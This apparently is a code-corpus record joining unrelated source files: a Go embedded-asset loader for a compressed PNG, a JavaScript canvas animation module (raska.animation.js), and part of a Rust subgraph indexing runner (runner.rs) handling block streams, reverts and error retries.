37\xa8\x9a\x3d\x83\xe5\x1a\xf5\xc3\x2f\xa4\x95\xea\xbf\x02\x10\xb5\xc3\x8f\xb3\x2f\x5e\x8e\x44\xbe\xb8\x93\x73\xbf\xdb\xd0\xcd\x93\xdb\x91\x2e\x6f\x02\x7b\x77\xd2\x6c\xd4\xdc\x4a\x69\x11\x1b\x40\x27\xb7\x7f\x5b\x37\x62\x8b\x15\xf8\xa7\xa6\x4d\x87\xf7\x9e\x57\xf9\xf1\x94\x14\x87\xbd\x90\xe4\x01\x31\x10\x84\x76\xf9\x7b\x65\x30\xc1\x4a\x12\xfa\x8b\x9f\x10\x29\x7a\x2a\xc3\x9e\xd7\x8d\x1c\x20\x46\x54\x0b\x39\x4c\x23\x10\xb1\xc8\x43\x6f\x08\x01\x0f\xb0\xd3\x46\x10\xe9\xef\x79\xe7\xb9\x76\x56\x14\xb1\x75\x86\x65\x6f\x85\x8f\xfd\x1d\x80\xde\x9e\x8e\x1e\x82\xbd\x1c\xfe\x73\x2b\x86\x09\x06\x29\x91\xa2\xa5\xbc\x57\xcd\xae\x43\x8f\xf0\x10\x4d\x18\xd8\xab\x67\x6a\x20\xc3\x7b\xc8\xf4\x11\x63\xb1\xb5\xc4\x03\xec\x60\x13\x47\x16\xac\xf3\xe3\x01\x76\x66\x09\x23\x5b\xd3\xf3\x50\xfe\xa7\x08\x23\x39\x4e\x69\xb1\xa5\x91\xa5\x3a\x86\xe5\x06\x10\x8a\x00\x66\x69\xa2\xbe\xf6\xdc\xb0\x3f\xa9\x96\xa4\xeb\xfe\x5b\xa1\x5e\xf6\xed\x4c\x1a\x8e\x61\x87\x9e\xdb\x54\x03\x40\x04\x78\xa9\xdf\x5a\x28\xea\x03\xff\xf0\x6d\xcb\x7e\x2f\xa4\xe8\x8f\x4e\x35\xfb\xff\xd3\xcf\x7d\xb3\x8c\x1f\x7c\x3c\xfd\xb6\x6c\xb6\xdf\x72\xe5\xf7\x37\xcc\x9e\xe5\xd6\xff\xae\x9e\x39\x7f\x1e\xd7\x43\x0b\xc3\x03\x97\x4c\xd6\x7e\x59\xc8\xff\x3f\xf2\xfb\x41\x76\xf9\x49\xb3\x37\xf7\x72\xb6\x3a\xbd\xd8\xb5\x6f\x2f\xab\x83\x00\xcb\x49\x46\x8e\x26\x05\x26\x05\x8e\x26\x8e\x06\x05\x0e\x25\x86\x26\x85\x0e\x06\x1a\x09\xd0\xdc\x02\x0a\x04\xa8\x69\xde\xa1\xb5\x4f\xeb\x99\x5f\x36\x88\x54\xbc\xac\xbc\x60\xc3\xc0\xc0\xc0\xe0\xe9\xea\xe7\xb2\xce\x29\xa1\x09\x10\x00\x00\xff\xff\x8d\xce\xf3\xdb\xf3\x42\x00\x00")
func init() | {
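// Illustrative comment (not in the original generated source): decompress the
// gzip-compressed PNG bytes embedded above and write the result into the
// in-memory filesystem (FS) at assets/openstack/operations/optimization/congress.png.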
rb := bytes.NewReader(FileAssetsOpenstackOperationsOptimizationCongressPng)
r, err := gzip.NewReader(rb)
if err != nil {
panic(err)
}
err = r.Close()
if err != nil {
panic(err)
}
f, err := FS.OpenFile(CTX, "assets/openstack/operations/optimization/congress.png", os.O_RDWR|os.O_CREATE|os.O_TRUNC, 0777)
if err != nil {
panic(err)
}
_, err = io.Copy(f, r)
if err != nil {
panic(err)
}
err = f.Close()
if err != nil {
panic(err)
}
} |
|
raska.animation.js | /// <reference path="raska.js" />
/**
* HTML5 canvas visual directed graph creation tool
*
* @module raska
* @submodule animation
* @main installUsing
*/
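/*
 * Illustrative usage sketch (not part of the original source). Assuming `element`
 * is a raska element already added to the canvas, the public API defined below
 * can be chained roughly like this:
 *
 *   raska.animation.on(element)
 *       .fadeIn(2, { maxHeight: 50, maxWidth: 50 })
 *       .move(function (x, y) { return { x: x + 1, y: y + 1 }; })
 *       .loop(100);
 *
 *   raska.animation.stopAll(); // stops every controller created via `on`
 */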
(function (w) {
'use strict';
if (typeof w.raska === 'undefined') { throw { message: "Raska was not found!" }; }
var $ = raska.$$.$q,
_helpers = raska.$$.$h,
_activeConfiguration = raska.$$.$c,
exceptions = {
invalidElement: function () {
this.message = "Invalid element";
this.code = "AN0";
}
},
tooling = (function () {
w.requestAnimationFrame = function () {
var _timer = null;
return w.requestAnimationFrame || w.webkitRequestAnimationFrame ||
w.mozRequestAnimationFrame || w.msRequestAnimationFrame ||
w.oRequestAnimationFrame || function (f) {
if (_timer !== null) {
w.clearTimeout(_timer);
}
_timer = w.setTimeout(f, _activeConfiguration.frameRefreshRate);
}
}();
return {
/**
* Executes a given delegate whenever possible
*
* @method execute
* @param {Function} what The delegate we want to execute
* @static
*/
execute: function (what) {
w.requestAnimationFrame(what);
}
};
})();
w.raska.baseAnimation = {
/**
* Handles the periodic draw of the elements in this Raska instance
*
* @method execute
* @chainable
* @static
*/
execute: function (then) { _helpers.$log.info("nope", then); return this; },
/**
* Resets changed element attributes to the default value
*
* @method resetElement
* @chainable
* @static
*/
resetElement: function () { return this; },
/**
* Stops the current animation
*
* @method stop
* @chainable
* @static
*/
stop: function () { return this; }
};
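// Illustrative sketch (not in the original source): concrete animations in this
// module are built by extending baseAnimation via _helpers.$obj.extend, e.g.:
//
//   var blink = _helpers.$obj.extend(w.raska.baseAnimation, {
//       execute: function (then) { /* do one animation step, then call then() */ return blink; },
//       stop: function () { return blink; }
//   }, true);
//
// The fadeIn / fadeOut / move implementations below follow this exact pattern.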
/**
* Controller for the animation routines
*
* @class AnimationChainController
* @constructor
*/
var AnimationChainController = function () {
var _animations = [],
_animationsCopy = [],
_saveStates = false,
_timer = null,
_loopTimer = null,
_inLoop = false,
_looperInterval = null,
_this = {
/**
* Registers a given animation object to be called
*
* @method register
* @param {raska.baseAnimation} animation Animation spec instance
* @chainable
* @static
*/
register: function (animation) {
if (_animations.indexOf(animation) === -1) {
_animations.push(animation);
if (_saveStates === true) {
_animationsCopy.push(animation);
}
}
return _this;
},
/**
* Stops all animations and clears all saved states from the chain
*
* @method stop
* @chainable
* @static
*/
stop: function () {
_inLoop = false;
if (_loopTimer !== null) { w.clearTimeout(_loopTimer); }
_helpers.$obj.forEach(_animations, function (i, ind) { i.stop(); });
_animations.length = 0;
_helpers.$obj.forEach(_animationsCopy, function (i, ind) { i.stop(); });
_animationsCopy.length = 0;
if (_timer !== null) {
window.clearTimeout(_timer);
_timer = null;
}
return _this;
},
/**
* Saves the initial states for all animations handled by this chain
*
* @method saveStates
* @chainable
* @static
*/
saveStates: function () {
_saveStates = true;
return _this;
},
/**
* Restores the animations from their initial saved states
*
* @method restoreFromSavedState
* @chainable
* @static
*/
restoreFromSavedState: function () {
if (_animations.length === 0 && _animationsCopy.length > 0) {
for (var i = 0; i < (_animations = _animationsCopy.slice()).length; i++) {
_animations[i].resetElement();
}
}
return _this;
},
/**
* Executes all registered animations in this chain, consuming (draining) the queue as it goes
*
* @method execute
* @param {Function} then What to do after all animations are done
* @param {number} interval Interval between animations
* @chainable
* @static
*/
execute: function (then, interval) {
if (_animations.length > 0) {
_animations.shift().execute(function () {
if (_helpers.$obj.isType(interval, "number") === true) {
if (_timer !== null) { window.clearTimeout(_timer); }
_timer = window.setTimeout(function () {
_this.execute(then, interval);
}, interval);
} else {
tooling.execute(function () { _this.execute(then); });
}
});
} else {
if (_helpers.$obj.isType(then, "function")) {
then();
}
}
return _this;
},
/**
* Executes all current animations in a loop
*
* @method loop
* @param {number} interval Interval between animations
* @chainable
* @static
*/
loop: function (interval) {
if (_inLoop === false) {
_inLoop = true;
_animationsCopy = _animations.slice();
}
_looperInterval = interval;
_looper();
return _this;
}
},
/**
* Controls the execution of the animation loop
*
* @method _looper
* @private
* @static
*/
_looper = function () {
if (_loopTimer !== null) {
window.clearTimeout(_loopTimer);
_loopTimer = null;
}
if (_inLoop === true) {
_this.restoreFromSavedState();
_this.execute(function () {
if (_inLoop === true) {
if (_helpers.$obj.isType(_looperInterval, "number") === true) {
if (_loopTimer !== null) {
window.clearTimeout(_loopTimer);
}
_loopTimer = w.setTimeout(_looper, _looperInterval);
} else {
tooling.execute(_looper);
}
}
});
}
};
return _this;
},
/**
* The public interface for the animation controller module
*
* @class PublicControllerInterface
* @param {_basicElement} targetElement The element we want to animate
* @constructor
*/
PublicControllerInterface = function (targetElement, _animationChainController) {
var _defaultStep = 1,
_thisPublicControllerInterface = {
/**
* Executes a fadein effect on a given element
*
* @method fadeInWithBoudaries
* @for PublicControllerInterface
* @param {object} maxValues The values for maxHeight and maxWidth
* @static
* @chainable
*/
fadeInWithBoudaries: function (maxValues) {
if (!_helpers.$obj.isValid(maxValues)) {
throw new exceptions.invalidElement();
}
return _thisPublicControllerInterface.fadeIn(_defaultStep, maxValues);
},
/**
* Executes a fadein effect on a given element
*
* @method fadeIn
* @for PublicControllerInterface
* @param {number} stepIncrement The speed the animation executes
* @param {object} maxValues The values for maxHeight and maxWidth
* @static
* @chainable
*/
fadeIn: function (stepIncrement, maxValues) {
if (!_helpers.$obj.isValid(targetElement)) {
throw new exceptions.invalidElement();
}
var _stoped = true,
_maxValues = maxValues || {},
_stepIncrement = stepIncrement || _defaultStep,
_fadeIn = function (changer, then) {
var maxH = _maxValues.maxHeight || targetElement.getHeight(),
maxW = _maxValues.maxWidth || targetElement.getWidth(),
currentH = 0,
currentW = 0,
changed = false,
fader = function () {
if (_stoped === true) {
return;
}
changed = false;
if ((currentH = targetElement.getHeight()) < maxH) {
targetElement.setHeight(Math.min(changer(currentH), maxH));
changed = true;
}
if ((currentW = targetElement.getWidth()) < maxW) {
targetElement.setWidth(Math.min(changer(currentW), maxW));
changed = true;
}
if (changed === true) {
tooling.execute(fader);
} else if (_helpers.$obj.isType(then, "function") === true) {
then();
}
};
targetElement.setWidth(0).setHeight(0);
tooling.execute(fader);
},
_this = _helpers.$obj.extend(w.raska.baseAnimation, (function () {
var initialW = targetElement.getWidth(),
initialH = targetElement.getHeight();
return {
step: _stepIncrement,
resetElement: function () {
targetElement.setWidth(initialW).setHeight(initialH);
return this;
},
execute: function (then) {
_stoped = false;
_fadeIn(function (x) { return x + _this.step; }, then);
return _this;
},
stop: function () {
_stoped = true;
return _this;
}
};
})(), true);
_animationChainController.register(_this);
return _thisPublicControllerInterface;
},
/**
* Executes a fadeOut effect on a given element
*
* @method fadeOut
* @for PublicControllerInterface
* @param {number} stepIncrement The speed the animation executes
* @static
* @chainable
*/
fadeOut: function (stepIncrement) {
if (!_helpers.$obj.isValid(targetElement)) {
throw new exceptions.invalidElement();
}
var _stoped = true,
_stepIncrement = stepIncrement || _defaultStep,
_fadeOut = function (changer, then) {
var minH = 0,
minW = 0,
currentH = targetElement.getHeight(),
currentW = targetElement.getWidth(),
changed = false,
fader = function () {
if (_stoped === true) {
return;
}
changed = false;
if ((currentH = targetElement.getHeight()) > minH) {
targetElement.setHeight(Math.max(changer(currentH), minH));
changed = true;
}
if ((currentW = targetElement.getWidth()) > minW) {
targetElement.setWidth(Math.max(changer(currentW), minW));
changed = true;
}
if (changed === true) {
tooling.execute(fader);
} else if (_helpers.$obj.isType(then, "function") === true) {
then();
}
};
tooling.execute(fader);
},
_this = _helpers.$obj.extend(w.raska.baseAnimation, (function () {
var initialW = targetElement.getWidth(),
initialH = targetElement.getHeight();
return {
step: _stepIncrement,
resetElement: function () {
targetElement.setWidth(initialW).setHeight(initialH);
return _this;
},
execute: function (then) {
_stoped = false;
_fadeOut(function (x) { return x - _this.step; }, then);
return _this;
},
stop: function () {
_stoped = true;
return _this;
}
};
})(), true);
| _animationChainController.register(_this);
return _thisPublicControllerInterface;
},
/**
* Moves a given element around (within canvas' boundaries)
*
* @method move
* @for PublicControllerInterface
* @param {Function} configuration How to move the element around
* @static
* @chainable
*/
move: function (configuration) {
if ((!_helpers.$obj.isValid(targetElement)) || (!_helpers.$obj.isType(configuration, "function"))) {
throw new exceptions.invalidElement();
}
var _stoped = true,
parent = targetElement.getParent(),
boundaries = (parent === null) ? raska.getCanvasBoundaries() : {
maxW: parent.getWidth(),
maxH: parent.getHeight()
},
_move = function (then) {
if (_stoped === true) {
return;
}
var newPosition = configuration(targetElement.x, targetElement.y);
if (newPosition.x >= boundaries.maxW) {
newPosition.x = 0;
}
if (newPosition.y >= boundaries.maxH) {
newPosition.y = 0;
}
targetElement.x = newPosition.x;
targetElement.y = newPosition.y;
if (_helpers.$obj.isType(then, "function") === true) {
tooling.execute(then);
}
},
_this = _helpers.$obj.extend(w.raska.baseAnimation, (function () {
return {
resetElement: function () { return _this; },
execute: function (then) {
_stoped = false;
_move(then);
return _this;
},
stop: function () {
_stoped = true;
return _this;
}
};
})(), true);
_animationChainController.register(_this);
return _thisPublicControllerInterface;
},
/**
* A simple fluent helper that makes chained animation code easier to read
* and compose
*
* @method then
* @for PublicControllerInterface
* @static
* @chainable
*/
then: function (what) {
if (_helpers.$obj.isType(what, "object") && _helpers.$obj.isType(what.execute, "function")) {
_animationChainController.register(_helpers.$obj.extend(w.raska.baseAnimation,
(function () {
var _this = {
resetElement: function () { return _this; },
execute: function (then) {
if (what.execute()) {
then();
}
return _this;
}
};
return _this;
})(), true));
}
return _thisPublicControllerInterface;
},
/**
* Executes the current chain of animations
*
* @method execute
* @param {number} interval The interval between executions of each animation
* @for PublicControllerInterface
* @static
* @chainable
*/
execute: function (interval) {
_animationChainController.execute(null, interval);
return _thisPublicControllerInterface;
},
/**
* Executes the current chain of animations (in a loop)
*
* @method loop
* @for PublicControllerInterface
* @param {number} interval The interval between executions of each animation
* @static
* @chainable
*/
loop: function (interval) {
_animationChainController.loop(interval);
return _thisPublicControllerInterface;
},
/**
* Enables saving the initial state of each animation
*
* @method saveInitialStates
* @for PublicControllerInterface
* @static
* @chainable
*/
saveInitialStates: function () {
_animationChainController.saveStates();
return _thisPublicControllerInterface;
},
/**
* Stops any active loop animation and clears all saved states up to this point
*
* @method stop
* @for PublicControllerInterface
* @static
* @chainable
*/
stop: function () {
_animationChainController.stop();
return _thisPublicControllerInterface;
}
};
return _thisPublicControllerInterface;
},
_public = (function () {
var _controllers = [],
_thisPublic = {
on: function (element) {
var controllerInstance = new PublicControllerInterface(element, new AnimationChainController());
_controllers.push(controllerInstance);
return controllerInstance;
},
stopAll: function () {
_helpers.$obj.forEach(_controllers, function (e) { e.stop(); });
return _thisPublic;
}
};
return _thisPublic;
})();
w.raska.animation = _public;
})(window); | |
runner.rs | use crate::subgraph::context::IndexingContext;
use crate::subgraph::error::BlockProcessingError;
use crate::subgraph::inputs::IndexingInputs;
use crate::subgraph::metrics::SubgraphInstanceMetrics;
use crate::subgraph::SubgraphInstance;
use atomic_refcell::AtomicRefCell;
use fail::fail_point;
use graph::blockchain::block_stream::{
BlockStream, BlockStreamEvent, BlockStreamMetrics, BlockWithTriggers, BufferedBlockStream,
};
use graph::blockchain::{Block, Blockchain, DataSource, TriggerFilter as _, TriggersAdapter};
use graph::components::{
store::{ModificationsAndCache, SubgraphFork},
subgraph::{CausalityRegion, MappingError, ProofOfIndexing, SharedProofOfIndexing},
};
use graph::data::store::scalar::Bytes;
use graph::data::subgraph::{
schema::{SubgraphError, SubgraphHealth, POI_OBJECT},
SubgraphFeature,
};
use graph::prelude::*;
use graph::util::{backoff::ExponentialBackoff, lfu_cache::LfuCache};
use lazy_static::lazy_static;
use std::convert::TryFrom;
use std::sync::Arc;
use std::time::{Duration, Instant};
const MINUTE: Duration = Duration::from_secs(60);
const SKIP_PTR_UPDATES_THRESHOLD: Duration = Duration::from_secs(60 * 5);
const BUFFERED_BLOCK_STREAM_SIZE: usize = 100;
const BUFFERED_FIREHOSE_STREAM_SIZE: usize = 1;
lazy_static! {
// Keep deterministic errors non-fatal even if the subgraph is pending.
// Used for testing Graph Node itself.
pub static ref DISABLE_FAIL_FAST: bool =
std::env::var("GRAPH_DISABLE_FAIL_FAST").is_ok();
/// Ceiling for the backoff retry of non-deterministic errors, in seconds.
pub static ref SUBGRAPH_ERROR_RETRY_CEIL_SECS: Duration =
std::env::var("GRAPH_SUBGRAPH_ERROR_RETRY_CEIL_SECS")
.unwrap_or((MINUTE * 30).as_secs().to_string())
.parse::<u64>()
.map(Duration::from_secs)
.expect("invalid GRAPH_SUBGRAPH_ERROR_RETRY_CEIL_SECS");
}
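// Illustrative configuration (not in the original source): both values are read
// from the environment, e.g.
//   GRAPH_DISABLE_FAIL_FAST=1                     (presence alone enables it)
//   GRAPH_SUBGRAPH_ERROR_RETRY_CEIL_SECS=1800     (cap retry backoff at 30 minutes)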
async fn new_block_stream<C: Blockchain>(
inputs: Arc<IndexingInputs<C>>,
filter: C::TriggerFilter,
block_stream_metrics: Arc<BlockStreamMetrics>,
) -> Result<Box<dyn BlockStream<C>>, Error> {
let chain = inputs.chain.cheap_clone();
let is_firehose = chain.is_firehose_supported();
let buffer_size = match is_firehose {
true => BUFFERED_FIREHOSE_STREAM_SIZE,
false => BUFFERED_BLOCK_STREAM_SIZE,
};
let block_stream = match is_firehose {
true => chain.new_firehose_block_stream(
inputs.deployment.clone(),
inputs.store.block_cursor(),
inputs.start_blocks.clone(),
Arc::new(filter.clone()),
block_stream_metrics.clone(),
inputs.unified_api_version.clone(),
),
false => {
let current_ptr = inputs.store.block_ptr();
chain.new_polling_block_stream(
inputs.deployment.clone(),
inputs.start_blocks.clone(),
current_ptr,
Arc::new(filter.clone()),
block_stream_metrics.clone(),
inputs.unified_api_version.clone(),
)
}
}
.await?;
Ok(BufferedBlockStream::spawn_from_stream(
block_stream,
buffer_size,
))
}
pub struct SubgraphRunner<C: Blockchain, T: RuntimeHostBuilder<C>> {
ctx: IndexingContext<T, C>,
inputs: Arc<IndexingInputs<C>>,
}
impl<C, T> SubgraphRunner<C, T>
where
C: Blockchain,
T: RuntimeHostBuilder<C>,
{
pub fn new(inputs: IndexingInputs<C>, ctx: IndexingContext<T, C>) -> Self {
Self {
inputs: Arc::new(inputs),
ctx,
}
}
pub async fn run(mut self) -> Result<(), Error> {
// Clone a few things for different parts of the async processing
let subgraph_metrics = self.ctx.subgraph_metrics.cheap_clone();
let store_for_err = self.inputs.store.cheap_clone();
let logger = self.ctx.state.logger.cheap_clone();
let id_for_err = self.inputs.deployment.hash.clone();
let mut should_try_unfail_deterministic = true;
let mut should_try_unfail_non_deterministic = true;
let mut synced = false;
let mut skip_ptr_updates_timer = Instant::now();
// Exponential backoff that starts with two minutes and keeps
// increasing its timeout exponentially until it reaches the ceiling.
let mut backoff = ExponentialBackoff::new(MINUTE * 2, *SUBGRAPH_ERROR_RETRY_CEIL_SECS);
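// Illustrative progression (assuming the delay roughly doubles per attempt and
// the default 30-minute ceiling): 2m, 4m, 8m, 16m, then 30m for every later attempt.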
loop {
debug!(logger, "Starting or restarting subgraph");
let block_stream_canceler = CancelGuard::new();
let block_stream_cancel_handle = block_stream_canceler.handle();
let metrics = self.ctx.block_stream_metrics.clone();
let filter = self.ctx.state.filter.clone();
let stream_inputs = self.inputs.clone();
let mut block_stream = new_block_stream(stream_inputs, filter, metrics.cheap_clone())
.await?
.map_err(CancelableError::Error)
.cancelable(&block_stream_canceler, || Err(CancelableError::Cancel));
let chain = self.inputs.chain.clone();
let chain_store = chain.chain_store();
// Keep the stream's cancel guard around to be able to shut it down
// when the subgraph deployment is unassigned
self.ctx
.state
.instances
.write()
.unwrap()
.insert(self.inputs.deployment.id, block_stream_canceler);
debug!(logger, "Starting block stream");
// Process events from the stream as long as no restart is needed
loop {
let event = {
let _section = metrics.stopwatch.start_section("scan_blocks");
block_stream.next().await
};
let (block, cursor) = match event {
Some(Ok(BlockStreamEvent::ProcessBlock(block, cursor))) => (block, cursor),
Some(Ok(BlockStreamEvent::Revert(subgraph_ptr, parent_ptr, cursor))) => {
info!(
logger,
"Reverting block to get back to main chain";
"block_number" => format!("{}", subgraph_ptr.number),
"block_hash" => format!("{}", subgraph_ptr.hash)
);
if let Err(e) = self
.inputs
.store
.revert_block_operations(parent_ptr, cursor.as_deref())
{
error!(
&logger,
"Could not revert block. Retrying";
"block_number" => format!("{}", subgraph_ptr.number),
"block_hash" => format!("{}", subgraph_ptr.hash),
"error" => e.to_string(),
);
// Exit inner block stream consumption loop and go up to loop that restarts subgraph
break;
}
self.ctx
.block_stream_metrics
.reverted_blocks
.set(subgraph_ptr.number as f64);
// Revert the in-memory state:
// - Remove hosts for reverted dynamic data sources.
// - Clear the entity cache.
//
// Note that we do not currently revert the filters, which means the filters
// will be broader than necessary. This is not ideal for performance, but is not
// incorrect since we will discard triggers that match the filters but do not
// match any data sources.
self.ctx
.state
.instance
.revert_data_sources(subgraph_ptr.number);
self.ctx.state.entity_lfu_cache = LfuCache::new();
continue;
}
// Log and drop the errors from the block_stream
// The block stream will continue attempting to produce blocks
Some(Err(e)) => {
if block_stream_cancel_handle.is_canceled() {
debug!(&logger, "Subgraph block stream shut down cleanly");
return Ok(());
}
debug!(
&logger,
"Block stream produced a non-fatal error";
"error" => format!("{}", e),
);
continue;
}
// Scenario where this can happen: 1504c9d8-36e4-45bb-b4f2-71cf58789ed9
None => unreachable!("The block stream stopped producing blocks"),
};
let block_ptr = block.ptr();
if block.trigger_count() > 0 {
subgraph_metrics
.block_trigger_count
.observe(block.trigger_count() as f64);
}
if block.trigger_count() == 0
&& skip_ptr_updates_timer.elapsed() <= SKIP_PTR_UPDATES_THRESHOLD
&& !synced
{
continue;
} else {
skip_ptr_updates_timer = Instant::now();
}
let start = Instant::now();
let deployment_failed = self.ctx.block_stream_metrics.deployment_failed.clone();
// If a subgraph failed for deterministic reasons, before processing a new block, we
// revert the deployment head. It should lead to the same result since the error was
// deterministic.
//
// As an optimization we check this only on the first run.
if should_try_unfail_deterministic {
should_try_unfail_deterministic = false;
if let Some(current_ptr) = self.inputs.store.block_ptr() {
if let Some(parent_ptr) = self
.inputs
.triggers_adapter
.parent_ptr(¤t_ptr)
.await?
{
// This reverts the deployment head to the parent_ptr if
// deterministic errors happened.
//
// There's no point in calling it if we have no current or parent block
// pointers, because there would be: no block to revert to or to search
// errors from (first execution).
self.inputs
.store
.unfail_deterministic_error(¤t_ptr, &parent_ptr)?;
}
}
}
let res = self
.process_block(
&logger,
self.inputs.triggers_adapter.cheap_clone(),
block_stream_cancel_handle.clone(),
block,
cursor.into(),
)
.await;
let elapsed = start.elapsed().as_secs_f64();
subgraph_metrics.block_processing_duration.observe(elapsed);
match res {
Ok(needs_restart) => {
// Once synced, no need to try to update the status again.
if !synced
&& is_deployment_synced(&block_ptr, chain_store.cached_head_ptr()?)
{
// Updating the sync status is a one-way operation.
// This state change exists: not synced -> synced
// This state change does NOT exist: synced -> not synced
self.inputs.store.deployment_synced()?;
// Stop trying to update the sync status.
synced = true;
// Stop recording time-to-sync metrics.
self.ctx.block_stream_metrics.stopwatch.disable();
}
// Keep trying to unfail the subgraph every time it advances block(s) until its
// health is no longer Failed.
if should_try_unfail_non_deterministic {
// If the deployment head advanced, we can unfail
// the non-deterministic error (if there's any).
self.inputs
.store
.unfail_non_deterministic_error(&block_ptr)?;
match self
.inputs
.store
.health(&self.inputs.deployment.hash)
.await?
{
SubgraphHealth::Failed => {
// If the unfail call didn't change the subgraph health, we keep
// `should_try_unfail_non_deterministic` as `true` until it's
// actually unfailed.
}
SubgraphHealth::Healthy | SubgraphHealth::Unhealthy => {
// Stop trying to unfail.
should_try_unfail_non_deterministic = false;
deployment_failed.set(0.0);
backoff.reset();
}
};
}
if needs_restart {
// Cancel the stream for real
self.ctx
.state
.instances
.write()
.unwrap()
.remove(&self.inputs.deployment.id);
// And restart the subgraph
break;
}
if let Some(stop_block) = &self.inputs.stop_block {
if block_ptr.number >= *stop_block {
info!(&logger, "stop block reached for subgraph");
return Ok(());
}
}
}
Err(BlockProcessingError::Canceled) => {
debug!(&logger, "Subgraph block stream shut down cleanly");
return Ok(());
}
// Handle unexpected stream errors by marking the subgraph as failed.
Err(e) => {
// Clear entity cache when a subgraph fails.
//
// This is done to be safe and sure that there's no state that's
// out of sync from the database.
//
// Without it, POI changes on failure would be kept in the entity cache
// and be transacted incorrectly in the next run.
self.ctx.state.entity_lfu_cache = LfuCache::new();
deployment_failed.set(1.0);
let message = format!("{:#}", e).replace("\n", "\t");
let err = anyhow!("{}, code: {}", message, LogCode::SubgraphSyncingFailure);
let deterministic = e.is_deterministic();
let error = SubgraphError {
subgraph_id: id_for_err.clone(),
message,
block_ptr: Some(block_ptr),
handler: None,
deterministic,
};
match deterministic {
true => {
// Fail subgraph:
// - Change status/health.
// - Save the error to the database.
store_for_err
.fail_subgraph(error)
.await
.context("Failed to set subgraph status to `failed`")?;
return Err(err);
}
false => {
// Shouldn't fail subgraph if it's already failed for non-deterministic
// reasons.
//
// If we don't do this check we would keep adding the same error to the
// database.
let should_fail_subgraph = self
.inputs
.store
.health(&self.inputs.deployment.hash)
.await?
!= SubgraphHealth::Failed;
if should_fail_subgraph {
// Fail subgraph:
// - Change status/health.
// - Save the error to the database.
store_for_err
.fail_subgraph(error)
.await
.context("Failed to set subgraph status to `failed`")?;
}
// Retry logic below:
// Cancel the stream for real.
self.ctx
.state
.instances
.write()
.unwrap()
.remove(&self.inputs.deployment.id);
let message = format!("{:#}", e).replace("\n", "\t");
error!(logger, "Subgraph failed with non-deterministic error: {}", message;
"attempt" => backoff.attempt,
"retry_delay_s" => backoff.delay().as_secs());
// Sleep before restarting.
backoff.sleep_async().await;
should_try_unfail_non_deterministic = true;
// And restart the subgraph.
break;
}
}
}
}
}
}
}
/// Processes a block and returns the updated context and a boolean flag indicating
/// whether new dynamic data sources have been added to the subgraph.
async fn process_block(
&mut self,
logger: &Logger,
triggers_adapter: Arc<C::TriggersAdapter>,
block_stream_cancel_handle: CancelHandle,
block: BlockWithTriggers<C>,
firehose_cursor: Option<String>,
) -> Result<bool, BlockProcessingError> {
let triggers = block.trigger_data;
let block = Arc::new(block.block);
let block_ptr = block.ptr();
let logger = logger.new(o!(
"block_number" => format!("{:?}", block_ptr.number),
"block_hash" => format!("{}", block_ptr.hash)
));
if triggers.len() == 1 {
debug!(&logger, "1 candidate trigger in this block");
} else if triggers.len() > 1 {
debug!(
&logger,
"{} candidate triggers in this block",
triggers.len()
);
}
let metrics = self.ctx.subgraph_metrics.clone();
let proof_of_indexing = if self
.inputs
.store
.clone()
.supports_proof_of_indexing()
.await?
{
Some(Arc::new(AtomicRefCell::new(ProofOfIndexing::new(
block_ptr.number,
))))
} else {
None
};
// There are currently no other causality regions since offchain data is not supported.
let causality_region = CausalityRegion::from_network(self.ctx.state.instance.network());
// Process events one after the other, passing in entity operations
// collected previously to every new event being processed
let mut block_state = match Self::process_triggers(
&logger,
BlockState::new(
self.inputs.store.clone(),
std::mem::take(&mut self.ctx.state.entity_lfu_cache),
),
&proof_of_indexing,
&self.ctx.subgraph_metrics,
&self.ctx.state.instance,
&block,
triggers,
&causality_region,
&self.inputs.debug_fork,
)
.await
{
// Triggers processed with no errors or with only deterministic errors.
Ok(block_state) => block_state,
// Some form of unknown or non-deterministic error occurred.
Err(MappingError::Unknown(e)) => return Err(BlockProcessingError::Unknown(e)),
Err(MappingError::PossibleReorg(e)) => {
info!(logger,
"Possible reorg detected, retrying";
"error" => format!("{:#}", e),
);
// In case of a possible reorg, we want this function to do nothing and restart the
// block stream so it has a chance to detect the reorg.
//
// The `ctx` is unchanged at this point, except for having cleared the entity cache.
// Losing the cache is a bit annoying but not an issue for correctness.
//
// See also b21fa73b-6453-4340-99fb-1a78ec62efb1.
return Ok(true);
}
};
// If new data sources have been created, restart the subgraph after this block.
// This is necessary to re-create the block stream.
let needs_restart = block_state.has_created_data_sources();
let host_metrics = self.ctx.host_metrics.clone();
let sqs_client = self.ctx.state.sqs_client.clone();
// This loop will:
// 1. Instantiate created data sources.
// 2. Process those data sources for the current block.
// Until no data sources are created or MAX_DATA_SOURCES is hit.
// Note that this algorithm processes data sources spawned on the same block _breadth
// first_ on the tree implied by the parent-child relationship between data sources. Only a
// very contrived subgraph would be able to observe this.
while block_state.has_created_data_sources() {
// Instantiate dynamic data sources, removing them from the block state.
let (data_sources, runtime_hosts) = self.create_dynamic_data_sources(
logger.clone(),
host_metrics.clone(),
block_state.drain_created_data_sources(),
)?;
let filter = C::TriggerFilter::from_data_sources(data_sources.iter());
// Reprocess the triggers from this block that match the new data sources
let block_with_triggers = triggers_adapter
.triggers_in_block(&logger, block.as_ref().clone(), &filter)
.await?;
let triggers = block_with_triggers.trigger_data;
if triggers.len() == 1 {
info!(
&logger,
"1 trigger found in this block for the new data sources"
);
} else if triggers.len() > 1 {
info!(
&logger,
"{} triggers found in this block for the new data sources",
triggers.len()
);
}
// Add entity operations for the new data sources to the block state
// and add runtimes for the data sources to the subgraph instance.
self.persist_dynamic_data_sources(
logger.clone(),
&mut block_state.entity_cache,
data_sources,
);
// Process the triggers in each host in the same order the
// corresponding data sources have been created.
for trigger in triggers {
block_state = SubgraphInstance::<C, T>::process_trigger_in_runtime_hosts(
&logger,
&runtime_hosts,
&block,
&trigger,
block_state,
&proof_of_indexing,
&causality_region,
&self.inputs.debug_fork,
&self.ctx.subgraph_metrics,
)
.await
.map_err(|e| {
// This treats a `PossibleReorg` as an ordinary error which will fail the subgraph.
// This can cause an unnecessary subgraph failure, to fix it we need to figure out a
// way to revert the effect of `create_dynamic_data_sources` so we may return a
// clean context as in b21fa73b-6453-4340-99fb-1a78ec62efb1.
match e {
MappingError::PossibleReorg(e) | MappingError::Unknown(e) => {
BlockProcessingError::Unknown(e)
}
}
})?;
}
}
let has_errors = block_state.has_errors();
let is_non_fatal_errors_active = self
.inputs
.features
.contains(&SubgraphFeature::NonFatalErrors);
// Apply entity operations and advance the stream
// Avoid writing to store if block stream has been canceled
if block_stream_cancel_handle.is_canceled() {
return Err(BlockProcessingError::Canceled);
}
